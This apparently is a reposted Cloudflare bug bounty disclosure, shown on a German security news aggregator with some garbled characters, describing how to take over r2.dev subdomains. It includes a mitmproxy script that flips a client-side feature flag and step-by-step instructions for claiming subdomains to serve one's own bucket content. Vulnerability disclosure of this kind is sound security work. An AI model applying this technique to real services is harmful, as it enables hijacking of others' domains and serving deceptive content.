๐ Cloudflare Public Bug Bounty: Take over subdomains of r2.dev using R2 custom domains
๐ก Newskategorie: Sicherheitslรผcken
๐ Quelle: vulners.com
โโโโโโโ โโโโ [โโโโ โโโโโโโโโ]โโโโโโโโโโโโโโโโโโ โโโ โโโโโโโโโโ It is possible to take over any subdomain of r2.dev (possible also the base domain) and have it serve the contents of an R2 bucket in your account. Requirements Access to R2 public buckets in the dashboard is currently behind a flag. The server-side check for access to R2 public buckets was recently removed, so you can just use an mitmproxy script to toggle the flag client-side. ```py import json import mitmproxy import re class R2PublicBuckets: async def response(self, flow: mitmproxy.http.HTTPFlow): if re.match(r'https?://dash.cloudflare.com/api/v4/accounts/[0-9a-f]{32}/flags', flow.request.url): data = json.loads(flow.response.text) data['result']['workers']['r2_publicbuckets'] = True flow.response.text = json.dumps(data, separators=(',', ':')) addons = [ R2PublicBuckets() ] ``` Steps Add r2.dev to your Cloudflare account and follow the steps until you're asked to complete zone ownership verification. Create an R2 bucket if you don't already have one and add e.g. albert.r2.dev as a custom domain in the "Domain Access" section. {F1926348} Wait a few seconds and then refresh the page. The custom domain should now show "Status: Active". In case "Access to Bucket" is "Not allowed", click the three dots besides the domain and then "Enable domain". {F1926346} Visit the custom domain and notice how it serves content from your R2 bucket. {F1926347}... ...